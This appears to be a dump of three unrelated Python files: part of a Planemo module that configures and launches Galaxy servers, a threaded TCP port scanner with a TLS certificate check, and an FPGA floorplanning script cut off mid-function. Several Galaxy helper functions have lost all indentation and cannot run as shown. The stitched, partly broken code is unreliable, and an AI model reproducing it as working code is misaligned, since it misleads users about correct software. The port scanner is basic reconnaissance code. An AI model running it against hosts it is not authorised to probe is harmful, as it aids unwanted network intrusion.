                                                self._kwds.get("install_repository_dependencies", True),
                                                self._kwds.get("install_most_recent_revision", False)
                                                )
            self.installed_repos[runnable.path], self.updated_repos[runnable.path] = workflow_repos
        default_from_path = self._kwds.get("workflows_from_path", False)
        # TODO: Allow serialization so this doesn't need to assume a
        # shared filesystem with Galaxy server.
        from_path = default_from_path or (runnable.type.name == "cwl_workflow")
        workflow = import_workflow(
            runnable.path, admin_gi=self.gi, user_gi=self.user_gi, from_path=from_path
        )
        self._workflow_ids[runnable.path] = workflow["id"]
    def workflow_id_for_runnable(self, runnable):
        """Return the workflow API ID for a runnable (remote or imported)."""
        if runnable.is_remote_workflow_uri:
            workflow_id = remote_runnable_to_workflow_id(runnable)
        else:
            workflow_id = self.workflow_id(runnable.path)
        return workflow_id
    def workflow_id(self, path):
        """Get installed workflow API ID for input path."""
        return self._workflow_ids[path]
    @property
    def use_path_paste(self):
        # Explicit CLI option wins; otherwise defer to the subclass default.
        option = self._kwds.get("paste_test_data_paths")
        if option is None:
            return self.default_use_path_paste
        else:
            return option
    @property
    def default_use_path_paste(self):
        # Conservative default; subclasses with filesystem access may override.
        return False
    @property
    def version_major(self):
        """Return target Galaxy version."""
        if self._target_version is UNINITIALIZED:
            self._target_version = self.user_gi.config.get_version()["version_major"]
        return self._target_version
    @property
    def user_api_config(self):
        """Return the API indicated configuration for user session."""
        if self._target_user_config is UNINITIALIZED:
            self._target_user_config = self.user_gi.config.get_config()
        return self._target_user_config
class BaseManagedGalaxyConfig(BaseGalaxyConfig):
    """Base class for Galaxy instances whose lifecycle Planemo manages.

    Adds the filesystem/config/environment state shared by the local and
    Docker implementations on top of the plain API-based config.
    """
    def __init__(
        self,
        ctx,
        config_directory,
        env,
        test_data_dir,
        port,
        server_name,
        master_api_key,
        runnables,
        kwds,
    ):
        # Managed instances are always reached on localhost at the chosen port.
        galaxy_url = "http://localhost:%d" % port
        super(BaseManagedGalaxyConfig, self).__init__(
            ctx=ctx,
            galaxy_url=galaxy_url,
            master_api_key=master_api_key,
            user_api_key=None,
            runnables=runnables,
            kwds=kwds
        )
        self.config_directory = config_directory
        self.env = env
        self.test_data_dir = test_data_dir
        self.port = port
        self.server_name = server_name
class DockerGalaxyConfig(BaseManagedGalaxyConfig):
    """A :class:`GalaxyConfig` description of a Dockerized Galaxy instance."""

    def __init__(
        self,
        ctx,
        config_directory,
        env,
        test_data_dir,
        port,
        server_name,
        master_api_key,
        runnables,
        docker_target_kwds,
        volumes,
        export_directory,
        kwds,
    ):
        super(DockerGalaxyConfig, self).__init__(
            ctx,
            config_directory,
            env,
            test_data_dir,
            port,
            server_name,
            master_api_key,
            runnables,
            kwds,
        )
        # Docker-specific wiring: how to reach the daemon, what to mount, where to export.
        self.docker_target_kwds = docker_target_kwds
        self.volumes = volumes
        self.export_directory = export_directory

    def kill(self):
        """Kill the planemo-managed Galaxy container."""
        kill_command = docker_util.kill_command(self.server_name, **self.docker_target_kwds)
        return shell(kill_command)

    def startup_command(self, ctx, **kwds):
        """Return a shell command used to startup this instance.

        Among other common planemo kwds, this should respect the
        ``daemon`` keyword.
        """
        run_in_background = kwds.get("daemon", False)
        background_flag = " -d" if run_in_background else ""
        publish_args = "-p %s:80%s" % (self.port, background_flag)
        env_directives = ["%s='%s'" % pair for pair in self.env.items()]
        image = kwds.get("docker_galaxy_image", "bgruening/galaxy-stable")
        run_command = docker_util.build_docker_run_command(
            "", image,
            interactive=False,
            env_directives=env_directives,
            working_directory=None,
            name=self.server_name,
            run_extra_arguments=publish_args,
            set_user=False,
            volumes=self.volumes,
            **self.docker_target_kwds
        )
        # The container user must be able to write into the mounted
        # configuration (and optional export) directories.
        chmod_command = ["chmod", "-R", "o+rwx", self.config_directory]
        if self.export_directory:
            chmod_command.append(self.export_directory)
        return shell_join(argv_to_str(chmod_command), run_command)

    @property
    def log_contents(self):
        """Return the container's captured log output."""
        logs_command = docker_util.logs_command(self.server_name, **self.docker_target_kwds)
        output, _ = communicate(logs_command)
        return output

    def cleanup(self):
        """Remove the generated configuration directory."""
        shutil.rmtree(self.config_directory, CLEANUP_IGNORE_ERRORS)
class LocalGalaxyConfig(BaseManagedGalaxyConfig):
    """A local, non-containerized implementation of :class:`GalaxyConfig`."""

    def __init__(
        self,
        ctx,
        config_directory,
        env,
        test_data_dir,
        port,
        server_name,
        master_api_key,
        runnables,
        galaxy_root,
        kwds,
    ):
        super(LocalGalaxyConfig, self).__init__(
            ctx,
            config_directory,
            env,
            test_data_dir,
            port,
            server_name,
            master_api_key,
            runnables,
            kwds,
        )
        # Root of the (possibly planemo-installed) Galaxy checkout.
        self.galaxy_root = galaxy_root

    def kill(self):
        """Kill the served Galaxy process via its pid file."""
        if self._ctx.verbose:
            # Verbose diagnostics to help debug stuck/missing processes.
            shell(["ps", "ax"])
            exists = os.path.exists(self.pid_file)
            print("Killing pid file [%s]" % self.pid_file)
            print("pid_file exists? [%s]" % exists)
            if exists:
                # BUG FIX: the file handle was previously leaked
                # (open(...).read() without close); use a context manager.
                with open(self.pid_file, "r") as f:
                    print("pid_file contents are [%s]" % f.read())
        kill_pid_file(self.pid_file)

    def startup_command(self, ctx, **kwds):
        """Return a shell command used to startup this instance.

        Among other common planemo kwds, this should respect the
        ``daemon`` keyword.
        """
        daemon = kwds.get("daemon", False)
        # TODO: Allow running dockerized Galaxy here instead.
        setup_venv_command = setup_venv(ctx, kwds)
        run_script = "%s $COMMON_STARTUP_ARGS" % shlex_quote(os.path.join(self.galaxy_root, "run.sh"))
        if daemon:
            run_script += " --daemon"
            self.env["GALAXY_RUN_ALL"] = "1"
        else:
            run_script += " --server-name %s" % shlex_quote(self.server_name)
        server_ini = os.path.join(self.config_directory, "galaxy.ini")
        self.env["GALAXY_CONFIG_FILE"] = server_ini
        if parse_version(kwds.get('galaxy_python_version') or DEFAULT_PYTHON_VERSION) >= parse_version('3'):
            # We need to start under gunicorn
            self.env['APP_WEBSERVER'] = 'gunicorn'
            self.env['GUNICORN_CMD_ARGS'] = "--timeout={timeout} --capture-output --bind={host}:{port} --name={server_name}".format(
                timeout=DEFAULT_TOOL_INSTALL_TIMEOUT,
                host=kwds.get('host', '127.0.0.1'),
                port=kwds['port'],
                server_name=self.server_name,
            )
        cd_to_galaxy_command = ['cd', self.galaxy_root]
        return shell_join(
            cd_to_galaxy_command,
            setup_venv_command,
            setup_common_startup_args(),
            run_script,
        )

    @property
    def log_file(self):
        """Log file used when planemo serves this Galaxy instance."""
        file_name = "%s.log" % self.server_name
        return os.path.join(self.galaxy_root, file_name)

    @property
    def pid_file(self):
        """Pid file written by the served Galaxy instance."""
        pid_file_name = "%s.pid" % self.server_name
        return os.path.join(self.galaxy_root, pid_file_name)

    @property
    def log_contents(self):
        """Return the server log contents, or '' if no log exists yet."""
        if not os.path.exists(self.log_file):
            return ""
        with open(self.log_file, "r") as f:
            return f.read()

    def cleanup(self):
        """Remove the generated configuration directory."""
        shutil.rmtree(self.config_directory, CLEANUP_IGNORE_ERRORS)

    @property
    def default_use_path_paste(self):
        # If Planemo started a local, native Galaxy instance assume files URLs can be
        # pasted.
        return self.user_is_admin
def _database_connection(database_location, **kwds):
    """Return the explicit ``database_connection`` kwd or a default SQLite URI for ``database_location``."""
    explicit = kwds.get("database_connection")
    if explicit:
        return explicit
    return DATABASE_LOCATION_TEMPLATE % database_location
def _find_galaxy_root(ctx, **kwds):
root_prop = "galaxy_root"
cwl = kwds.get("cwl", False)
if cwl:
root_prop = "cwl_galaxy_root"
galaxy_root = kwds.get(root_prop, None)
if galaxy_root:
return galaxy_root
else:
par_dir = os.getcwd()
while True:
run = os.path.join(par_dir, "run.sh")
config = os.path.join(par_dir, "config")
if os.path.isfile(run) and os.path.isdir(config):
return par_dir
new_par_dir = os.path.dirname(par_dir)
if new_par_dir == par_dir:
break
par_dir = new_par_dir
return None
def _find_test_data(runnables, **kwds):
test_data_search_path = "."
runnables = [r for r in runnables if r.has_tools]
if len(runnables) > 0:
test_data_search_path = runnables[0].test_data_search_path
# Find test data directory associated with path.
test_data = kwds.get("test_data", None)
if test_data:
return os.path.abspath(test_data)
else:
test_data = _search_tool_path_for(test_data_search_path, "test-data")
if test_data:
return test_data
warn(NO_TEST_DATA_MESSAGE)
return None
def _find_tool_data_table(runnables, test_data_dir, **kwds):
tool_data_search_path = "."
runnables = [r for r in runnables if r.has_tools]
if len(runnables) > 0:
tool_data_search_path = runnables[0].tool_data_search_path
tool_data_table = kwds.get("tool_data_table", None)
if tool_data_table:
return os.path.abspath(tool_data_table)
else:
extra_paths = [test_data_dir] if test_data_dir else []
return _search_tool_path_for(
tool_data_search_path,
"tool_data_table_conf.xml.test",
extra_paths,
) or _search_tool_path_for( # if all else fails just use sample
tool_data_search_path,
"tool_data_table_conf.xml.sample"
)
def _search_tool_path_for(path, target, extra_paths=None):
"""Check for presence of a target in different artifact directories."""
if extra_paths is None:
extra_paths = []
if not os.path.isdir(path):
tool_dir = os.path.dirname(path)
else:
tool_dir = path
possible_dirs = [tool_dir, "."] + extra_paths
for possible_dir in possible_dirs:
possible_path = os.path.join(possible_dir, target)
if os.path.exists(possible_path):
return os.path.abspath(possible_path)
return None
def _configure_sheds_config_file(ctx, config_directory, **kwds):
    # Write a tool_sheds_conf.xml pointing at the configured (or default)
    # tool shed and return the path of the written file.
    if "shed_target" not in kwds:
        kwds = kwds.copy()  # avoid mutating the caller's kwds
        kwds["shed_target"] = "toolshed"
    shed_target_url = tool_shed_url(ctx, **kwds)
    contents = _sub(TOOL_SHEDS_CONF, {"shed_target_url": shed_target_url})
    tool_sheds_conf = os.path.join(config_directory, "tool_sheds_conf.xml")
    write_file(tool_sheds_conf, contents)
    return tool_sheds_conf
def _tool_conf_entry_for(tool_paths):
tool_definitions = ""
for tool_path in tool_paths:
if os.path.isdir(tool_path):
tool_definitions += '''<tool_dir dir="%s" />''' % tool_path
else:
tool_definitions += '''<tool file="%s" />''' % tool_path
return tool_definitions
def _install_galaxy(ctx, galaxy_root, env, kwds):
    """Install Galaxy into ``galaxy_root``, via a cached git clone unless caching is disabled."""
    use_cache = not kwds.get("no_cache_galaxy", False)
    if use_cache:
        _install_galaxy_via_git(ctx, galaxy_root, env, kwds)
    else:
        _install_galaxy_via_download(ctx, galaxy_root, env, kwds)
def _install_galaxy_via_download(ctx, galaxy_root, env, kwds):
    """Fetch a Galaxy branch tarball from GitHub, unpack it into ``galaxy_root``, and set it up."""
    branch = _galaxy_branch(kwds)
    tarball_url = "https://codeload.github.com/galaxyproject/galaxy/tar.gz/" + branch
    untar_to(tarball_url, tar_args=['-xvzf', '-', 'galaxy-' + branch], dest_dir=galaxy_root)
    _install_with_command(ctx, galaxy_root, env, kwds)
def _install_galaxy_via_git(ctx, galaxy_root, env, kwds):
    """Clone Galaxy from the cached local mirror into ``galaxy_root`` and set it up.

    Raises an Exception if the clone fails.
    """
    gx_repo = _ensure_galaxy_repository_available(ctx, kwds)
    branch = _galaxy_branch(kwds)
    command = git.command_clone(ctx, gx_repo, galaxy_root, branch=branch)
    exit_code = shell(command, env=env)
    if exit_code != 0:
        # BUG FIX: error message previously read "glone".
        raise Exception("Failed to clone Galaxy via git")
    _install_with_command(ctx, galaxy_root, env, kwds)
def _galaxy_branch(kwds):
branch = kwds.get("galaxy_branch", None)
if branch is None:
cwl = kwds.get("cwl", False)
branch = "cwl-1.0" if cwl else None
if branch is None:
branch = DEFAULT_GALAXY_BRANCH
return branch
def _galaxy_source(kwds):
source = kwds.get("galaxy_source", None)
if source is None:
cwl = kwds.get("cwl", False)
source = CWL_GALAXY_SOURCE if cwl else None
if source is None:
source = DEFAULT_GALAXY_SOURCE
return source
def _install_with_command(ctx, galaxy_root, env, kwds):
    """Run Galaxy's startup/setup commands inside ``galaxy_root`` and sanity-check the result.

    Raises an Exception when the command fails or the expected directory
    layout is not produced.
    """
    install_cmd = shell_join(
        setup_venv(ctx, kwds),
        setup_common_startup_args(),
        COMMAND_STARTUP_COMMAND,
    )
    exit_code = shell(install_cmd, cwd=galaxy_root, env=env)
    if exit_code != 0:
        raise Exception("Failed to install Galaxy via command [%s]" % install_cmd)
    if not os.path.exists(galaxy_root):
        raise Exception("Failed to create Galaxy directory [%s]" % galaxy_root)
    if not os.path.exists(os.path.join(galaxy_root, "lib")):
        raise Exception("Failed to create Galaxy directory [%s], lib missing" % galaxy_root)
def _ensure_galaxy_repository_available(ctx, kwds):
    # Maintain a local mirror clone of the Galaxy repository inside the planemo
    # workspace (one mirror per distinct source, with a "_cwl" suffix for the
    # CWL fork) and return its path. Existing mirrors get a best-effort update.
    workspace = ctx.workspace
    cwl = kwds.get("cwl", False)
    galaxy_source = kwds.get('galaxy_source')
    if galaxy_source and galaxy_source != DEFAULT_GALAXY_SOURCE:
        # Non-default sources get their own cache directory keyed on a
        # filesystem-safe version of the source URL (truncated to 255 chars).
        sanitized_repo_name = "".join(c if c.isalnum() else '_' for c in kwds['galaxy_source']).rstrip()[:255]
        gx_repo = os.path.join(workspace, "gx_repo_%s" % sanitized_repo_name)
    else:
        gx_repo = os.path.join(workspace, "gx_repo")
    if cwl:
        gx_repo += "_cwl"
    if os.path.exists(gx_repo):
        # Convert the git repository from bare to mirror, if needed
        shell(['git', '--git-dir', gx_repo, 'config', 'remote.origin.fetch', '+refs/*:refs/*'])
        shell(['git', '--git-dir', gx_repo, 'config', 'remote.origin.mirror', 'true'])
        # Attempt remote update - but don't fail if not interweb, etc...
        shell("git --git-dir %s remote update >/dev/null 2>&1" % gx_repo)
    else:
        # First use: create the mirror clone.
        remote_repo = _galaxy_source(kwds)
        command = git.command_clone(ctx, remote_repo, gx_repo, mirror=True)
        shell(command)
    return gx_repo
def _build_env_for_galaxy(properties, template_args):
    """Translate Galaxy properties into GALAXY_CONFIG_OVERRIDE_* environment variables.

    Values are template-substituted with ``template_args``; None values
    are skipped entirely.
    """
    env = {}
    for key, value in iteritems(properties):
        if value is None:  # Do not override None with empty string
            continue
        env["GALAXY_CONFIG_OVERRIDE_%s" % key.upper()] = _sub(value, template_args)
    return env
def _build_test_env(properties, env):
# Keeping these environment variables around for a little while but
# many are probably not needed as of the following commit.
# https://bitbucket.org/galaxy/galaxy-central/commits/d7dd1f9
test_property_variants = {
'GALAXY_TEST_JOB_CONFIG_FILE': 'job_config_file',
'GALAXY_TEST_MIGRATED_TOOL_CONF': 'migrated_tools_config',
'GALAXY_TEST_TOOL_CONF': 'tool_config_file',
'GALAXY_TEST_FILE_DIR': 'test_data_dir',
'GALAXY_TOOL_DEPENDENCY_DIR': 'tool_dependency_dir',
# Next line would be required for tool shed tests.
# 'GALAXY_TEST_TOOL_DEPENDENCY_DIR': 'tool_dependency_dir',
}
for test_key, gx_key in test_property_variants.items():
value = properties.get(gx_key, None)
if value is not None:
env[test_key] = value
def _handle_job_config_file(config_directory, server_name, kwds):
    # Ensure kwds["job_config_file"] is set: if the caller did not supply one,
    # render the local job_conf.xml template (with docker settings substituted)
    # into config_directory and record its path back into kwds.
    job_config_file = kwds.get("job_config_file", None)
    if not job_config_file:
        template_str = JOB_CONFIG_LOCAL
        job_config_file = os.path.join(
            config_directory,
            "job_conf.xml",
        )
        docker_enable = str(kwds.get("docker", False))
        docker_host = kwds.get("docker_host", docker_util.DEFAULT_HOST)
        docker_host_param = ""
        if docker_host:
            docker_host_param = """<param id="docker_host">%s</param>""" % docker_host
        conf_contents = Template(template_str).safe_substitute({
            "server_name": server_name,
            "docker_enable": docker_enable,
            "require_container": "false",
            "docker_sudo": str(kwds.get("docker_sudo", False)),
            "docker_sudo_cmd": str(kwds.get("docker_sudo_cmd", docker_util.DEFAULT_SUDO_COMMAND)),
            "docker_cmd": str(kwds.get("docker_cmd", docker_util.DEFAULT_DOCKER_COMMAND)),
            "docker_host_param": docker_host_param,
        })
        write_file(job_config_file, conf_contents)
    # Record the (supplied or generated) path for downstream consumers.
    kwds["job_config_file"] = job_config_file
def _write_tool_conf(ctx, tool_paths, tool_conf_path):
    """Render a tool_conf file listing ``tool_paths`` and write it to ``tool_conf_path``."""
    entries = _tool_conf_entry_for(tool_paths)
    contents = _sub(TOOL_CONF_TEMPLATE, dict(tool_definition=entries))
    write_file(tool_conf_path, contents)
    ctx.vlog(
        "Writing tool_conf to path %s with contents [%s]",
        tool_conf_path,
        contents,
    )
def _handle_container_resolution(ctx, kwds, galaxy_properties):
    """Enable mulled container resolution in ``galaxy_properties`` when requested via kwds."""
    if not kwds.get("mulled_containers", False):
        return
    galaxy_properties["enable_beta_mulled_containers"] = "True"
    involucro_context = build_involucro_context(ctx, **kwds)
    galaxy_properties["involucro_auto_init"] = "False"  # Use planemo's
    galaxy_properties["involucro_path"] = involucro_context.involucro_bin
def _handle_job_metrics(config_directory, kwds):
    """Write an empty job metrics configuration and record its path in kwds."""
    metrics_conf = os.path.join(config_directory, "job_metrics_conf.xml")
    with open(metrics_conf, "w") as metrics_fh:
        metrics_fh.write(EMPTY_JOB_METRICS_TEMPLATE)
    kwds["job_metrics_config_file"] = metrics_conf
def _handle_refgenie_config(config_directory, galaxy_root, kwds):
    """Create a refgenie genome config under ``config_directory`` and record its path in kwds."""
    refgenie_dir = os.path.join(config_directory, 'refgenie')
    _ensure_directory(refgenie_dir)
    config_path = os.path.join(refgenie_dir, "genome_config.yaml")
    config_contents = get_refgenie_config(galaxy_root=galaxy_root, refgenie_dir=refgenie_dir)
    with open(config_path, "w") as config_fh:
        config_fh.write(config_contents)
    kwds["refgenie_config_file"] = config_path
def _handle_kwd_overrides(properties, kwds):
kwds_gx_properties = [
'job_config_file',
'job_metrics_config_file',
'dependency_resolvers_config_file',
]
for prop in kwds_gx_properties:
val = kwds.get(prop, None)
if val:
properties[prop] = val
def _sub(template, args):
if template is None:
return ''
return Template(template).safe_substitute(args)
def _ensure_directory(path):
if path is not None and not os.path.exists(path):
os.makedirs(path)
# Explicit public API of this module.
__all__ = (
    "DATABASE_LOCATION_TEMPLATE",
    "galaxy_config",
)
|
__init__.py | import socket
import threading
import ssl
from queue import Queue
import time
q = Queue()  # work queue of port numbers shared with the worker threads
max_threads = 100  # size of the scanning thread pool
starting_port = 1  # first port to check
max_port = 445  # NOTE(review): the enqueue loop uses range(starting_port, max_port), so this port itself is never scanned — confirm intent
secure_ports = [22, 443, 465, 993, 995]  # ports where a TLS certificate lookup is attempted
print_errors = False  # set True to dump per-port failure messages after the scan
connection_timeout = 5.0  # seconds to wait per connection attempt
ports_failed = []  # failure messages appended by worker threads
host = input("Enter host to check (example: www.google.com): ")
print("Checking ports \n")
start_time = time.time()
# Shared lock so output/list updates from scanner threads do not interleave.
# BUG FIX: the original created a brand-new threading.Lock() inside each call,
# which provides no mutual exclusion at all.
_report_lock = threading.Lock()

def port_scan(port):
    """Attempt a TCP connection to (host, port); report open ports and collect failures.

    For ports in ``secure_ports`` the peer TLS certificate expiry is also printed.
    """
    # BUG FIX: the original created an extra socket here and immediately
    # rebound the name, leaking the first socket object.
    try:
        connection = socket.create_connection((host, port), timeout=connection_timeout)
        with _report_lock:
            print('Port', port, 'is open on', host)
            if port in secure_ports:
                cert_result = check_certificate(connection, port)
                print("Certificate expires:", cert_result['notAfter'])
        connection.close()
    except Exception as e:
        with _report_lock:
            ports_failed.append("Port {} responded: {}".format(str(port), e))
def check_certificate(connection, port):
    """Upgrade the already-connected socket to TLS and return the peer certificate dict.

    NOTE(review): assumes the service speaks TLS immediately (true for
    443/465/993/995, but port 22 is SSH, so the handshake would fail there
    and surface as a caught exception in port_scan) — confirm intent.
    The ``port`` parameter is currently unused.
    """
    cert_context = ssl.create_default_context()
    with cert_context.wrap_socket(connection, server_hostname=host) as cert:
        return cert.getpeercert()
def threader():
    """Worker loop: pull port numbers off the shared queue and scan them until the process exits."""
    while True:
        port_number = q.get()
        port_scan(port_number)
        q.task_done()
# Spin up the worker pool; daemon threads die with the main thread.
for _ in range(max_threads):
    worker_thread = threading.Thread(target=threader)
    worker_thread.daemon = True
    worker_thread.start()
# Enqueue every port in [starting_port, max_port].
# BUG FIX: range() excludes its end, so max_port itself was never scanned;
# add 1 to include it.
for port_number in range(starting_port, max_port + 1):
    q.put(port_number)
q.join()
if print_errors:
    for error in ports_failed:
        print(error)
print("Scan took %.2f seconds" % (time.time() - start_time))
|
floorplanner.py | #!/usr/bin/env python3
""" author: Jianqi Chen """
import sys, os, svgwrite, random, copy, numpy, getopt, re, threading, multiprocessing, json, datetime, itertools
from queue import Queue
from SlicingTree import STree
s_floorplan = None # the slicing tree, just remember it's a global variable
PROCESS_MAX = 5 # Maximal number of processes for RunHotSpot() and ModuleIRLGen()
colormap = {'LAB':'blue','RAM':'orange','DSP':'red'}  # SVG fill color per resource type
asp_max = 3.5 # maximum aspect ratio for a single module, minimum is 1/asp_max
alpha = 1 # for intermediate floorplans, maximum area is (alpha*WIDTH) * (alpha*HEIGHT), 1<=alpha<=2
temp_am = 310 #ambient temperature for HotSpot (Kelvin)
leaf_IRL = {} #IRL of leaves (functional modules), usually only generate once for given resource/module files
history_record = {} #stores slicing trees (keyed by Polish expression) and their cost that are evaluated
final_result = None #[max_temperature,[(mod_name1,[x,y,w,h]),(mod_name2,[x,y,w,h])...]]
# coefficients in SA's cost function: cost = ( aaa*temp_max + bbb*tot_ap + ccc*tot_wl ) * ( 0.2*area_ex/(WIDTH*HEIGHT) + 1)
aaa = 2#0.2
bbb = 0.1
ccc = 0.0005#0.002
# coefficients in MCG's cost functional: cost = mcg_alpha*BoundingArea + mcg_beta*sum{sqrt(mod_area_self*mod_area_other)/(dist*(power_density difference + mcg_const))}
mcg_alpha = 0.97
mcg_beta = 0.03
mcg_const = 0.05
# use sa-based floorplanner or mcg-based (both default off; set via -t/--type)
sa_flg = False
mcg_flg = False
def usage():
    """Print command-line usage help for the floorplanner."""
    help_lines = (
        "To run the program for [design_name], [design_name].module and [design_name].res should be provided. Then enter:",
        "\t./floorplanner.py -t [floorplanner_type] [design_name]",
        "design_name = 'test' by default",
        "floorplanner_type can be 'sa' for simulated annealing or 'mcg' for modified cluster growth",
    )
    for help_line in help_lines:
        print(help_line)
def main():
    # Top-level driver: draw the empty floorplan, then run the floorplanner(s)
    # selected on the command line (sa_flg / mcg_flg set by SetGlobalVar).
    print('Floorplanning starting at '+str( datetime.datetime.now() ))
    # Draw empty floorplan
    DrawFloorplan('./output_files/empty_floorplan.svg',[])
    print ('sa:',sa_flg)
    print ('mcg:',mcg_flg)
    if sa_flg:
        # set alpha value
        PreEstimate()
        # floorplanning using simulated annealing
        mod_loc_list = FloorplaningSA()
    if mcg_flg:
        # floorplanning using cluster growth
        FloorplaningMCG()
    print('Finishing at '+str( datetime.datetime.now() ))
# handle command line arguments by setting global variables
def SetGlobalVar(argv):
    # Parse command-line options into the module-level configuration globals
    # (cost coefficients, floorplanner type, process limit, design name).
    global design_name, aaa, bbb, ccc, mcg_alpha, mcg_beta, mcg_const, sa_flg, mcg_flg, PROCESS_MAX
    os.system('mkdir -p output_files')
    os.system('chmod 744 ./hotspot/hotspot ./hotspot/grid_thermal_map.pl')
    # Output file
    # NOTE(review): final_result is dumped here before any floorplanning has
    # run (it is still None at this point) — confirm this initial dump is
    # intentional and not meant to happen after the run completes.
    if not os.path.isdir('./output_files/json'):
        os.system('mkdir ./output_files/json')
    with open('./output_files/json/final_result','w') as json_file:
        json.dump(final_result, json_file)
    try:
        opts, args = getopt.getopt(argv,'ht:',['help','sa_a=','sa_b=','sa_c=','mcg_a=','mcg_b=','mcg_c=','type=','process_limit='])
    except getopt.GetoptError:
        usage()
        sys.exit(1)
    print('opts:',opts)
    print('args:',args)
    for opt, arg in opts:
        if opt in ('-h','--help'):
            usage()
            sys.exit(0)
        elif opt == '--sa_a':
            aaa = float(arg)
        elif opt == '--sa_b':
            bbb = float(arg)
        elif opt == '--sa_c':
            ccc = float(arg)
        elif opt == '--mcg_a':
            mcg_alpha = float(arg)
        elif opt == '--mcg_b':
            mcg_beta = float(arg)
        elif opt == '--mcg_c':
            mcg_const = float(arg)
        elif opt in ('-t','--type'):
            if arg == 'sa':
                sa_flg = True
            elif arg == 'mcg':
                mcg_flg = True
            else:
                usage()
                sys.exit(2)
        elif opt == '--process_limit':
            PROCESS_MAX = int(arg)
        else:
            usage()
            sys.exit(2)
    # At most one positional argument: the design name.
    if len(args) > 1:
        usage()
        sys.exit(2)
    elif len(args) == 1:
        design_name = args[0]
def PreEstimate():
    # Set the global alpha (allowed intermediate-floorplan area expansion)
    # based on the worst-case resource utilization ratio: the tighter the
    # resources, the more slack intermediate floorplans are given.
    global alpha
    cell_type = list( map(lambda p: p[0],res_cells) )
    usage_ratio = []
    for res in resource:
        count_a = cell_type.count(res) #number of available resources
        count_n = 0 #number of resources needed
        for mod in module_list:
            count_n += module_list[mod][0][res]
        ratio_u = count_n/count_a
        usage_ratio.append(ratio_u)
    key_ratio = max(usage_ratio)
    # Thresholds below are empirically chosen; >0.86 is considered infeasible.
    if key_ratio > 0.86:
        print('Not enough FPGA resources')
        sys.exit(0)
    elif key_ratio > 0.8:
        alpha = 1.5
    elif key_ratio > 0.5:
        alpha = 1.4
    elif key_ratio > 0.4:
        alpha = 1.25
    elif key_ratio > 0.3:
        alpha = 1.1
    else:
        alpha = 1
# check whether the cell is inside the rectangle
# (cx,cy): coordinate of the cell, every cell's (x,y) actually represents 4 cells
# e.g. cx=1, cy=3, the four cells' location: (1,3),(WIDTH+1,3),(1,HEIGHT+3),(WIDTH+1,HEIGHT+3)
# cw: cell width, ch: cell height, (rx,ry):left bottom coordinate of rectangle, rw: rect width, rh: rect height
def CellInRect(cx,cy,cw,ch,rx,ry,rw,rh):
    """Count how many of a cell's four replicas fall fully inside a rectangle.

    Each cell coordinate represents four cells at (cx,cy), (cx+WIDTH,cy),
    (cx,cy+HEIGHT) and (cx+WIDTH,cy+HEIGHT); cw/ch is the cell footprint and
    (rx,ry,rw,rh) the rectangle (bottom-left corner, width, height).
    """
    rect_right = rx + rw - 1
    rect_top = ry + rh - 1
    count = 0
    # Test every replica origin against the rectangle bounds.
    for origin_x in (cx, cx + WIDTH):
        for origin_y in (cy, cy + HEIGHT):
            inside = (
                origin_x >= rx and origin_y >= ry
                and (origin_x + cw - 1) <= rect_right
                and (origin_y + ch - 1) <= rect_top
            )
            if inside:
                count += 1
    return count
# irreducible realization list(IRL) generation for a single module, at a single location
# x,y is the coordinate of the left bottom corner, mod_res is a dict of resource required e.g. {'lAB':12,'RAM':1}
# return a list of rectangle r = (x,y,w,h), w=width, h=height
def SingleIRLGen(x,y,mod_res):
    """Generate the irreducible realization list (IRL) for one module at one location.

    (x, y) is the bottom-left corner; mod_res maps resource type to the
    required count, e.g. {'LAB': 12, 'RAM': 1}. Returns a list of feasible
    rectangles (x, y, w, h) bounded by aspect ratio asp_max and the
    alpha-expanded floorplanning area.
    """
    v_WIDTH = int(alpha*WIDTH)  # virtual width of the whole floorplanning area
    v_HEIGHT = int(alpha*HEIGHT)
    IRL = []

    def _covers(rect_w, rect_h):
        # True when rectangle (x, y, rect_w, rect_h) contains at least the
        # required number of every resource type in mod_res.
        for res in mod_res:
            cell_w = resource[res][0]  # cell width
            cell_h = resource[res][1]  # cell height
            count = 0
            useful_cells = filter(lambda p: p[0] == res and p[1] >= x and p[2] >= y, res_cells)
            for cell in useful_cells:
                count += CellInRect(cell[1], cell[2], cell_w, cell_h, x, y, rect_w, rect_h)
            if count < mod_res[res]:
                return False
        return True

    # BUG FIX: rm_flg was previously only assigned inside the search loops,
    # so exiting the square search without a hit left it unbound and the
    # later "if rm_flg" raised UnboundLocalError. Initialize it up front.
    rm_flg = False

    # Phase 1: grow a square until it covers the required resources or
    # runs out of the virtual area.
    s_width = 1
    while True:
        if _covers(s_width, s_width):
            IRL.append( (x,y,s_width,s_width) )
            rm_flg = True
            break
        elif (x + s_width) <= v_WIDTH and (y + s_width) <= v_HEIGHT:
            s_width += 1
        else:
            break

    # Phase 2: wide rectangles (width > height). rm_flg carries over so a
    # newly found rectangle replaces the previously appended (reducible) one.
    l_height = s_width - 1
    l_width = s_width
    while l_height >= 1:
        while l_width/l_height < asp_max and (x + l_width) <= v_WIDTH:
            if _covers(l_width, l_height):
                if rm_flg:
                    IRL.pop()
                IRL.append( (x,y,l_width,l_height) )
                rm_flg = True
                break
            else:
                l_width += 1
                rm_flg = False
        if (x + l_width) > v_WIDTH:
            break
        l_height -= 1

    # Phase 3: tall rectangles (width < height), symmetric to phase 2.
    t_height = s_width
    t_width = s_width - 1
    while t_width >= 1:
        while t_height/t_width < asp_max and (y + t_height) <= v_HEIGHT:
            if _covers(t_width, t_height):
                if rm_flg:
                    IRL.pop()
                IRL.append( (x,y,t_width,t_height) )
                rm_flg = True
                break
            else:
                t_height += 1
                rm_flg = False
        if (y + t_height) > v_HEIGHT:
            break
        t_width -= 1
    return IRL
# IRL generation for a single module at all possible locations
# IRL belongs to {r=(x,y,w,h)|x>0,y>0,x+w<alpha*WIDTH,y+h<alpha*HEIGHT}
# mod_res is a dict of resource required e.g. {'lAB':12,'RAM':1}
# store the IRL in a list
def ModuleIRLGen(mod_res, mod_name):
    """Generate the IRL for one module at every location and persist it as JSON.

    mod_res maps resource type to required count. Writes
    ./output_files/json/<mod_name>_IRL and returns the IRL list. Concurrency
    is throttled by the sema_irlgen semaphore.
    """
    sema_irlgen.acquire()
    # BUG FIX: release the semaphore even if generation or file IO raises;
    # previously an exception permanently consumed a semaphore slot.
    try:
        IRL = []
        for x in range(int(alpha*WIDTH)):
            for y in range(int(alpha*HEIGHT)):
                IRL += SingleIRLGen(x,y,mod_res)
        if not os.path.isdir('./output_files/json'):
            os.system('mkdir ./output_files/json')
        irl_dict = {mod_name: IRL}
        with open('./output_files/json/'+mod_name+'_IRL','w') as json_file:
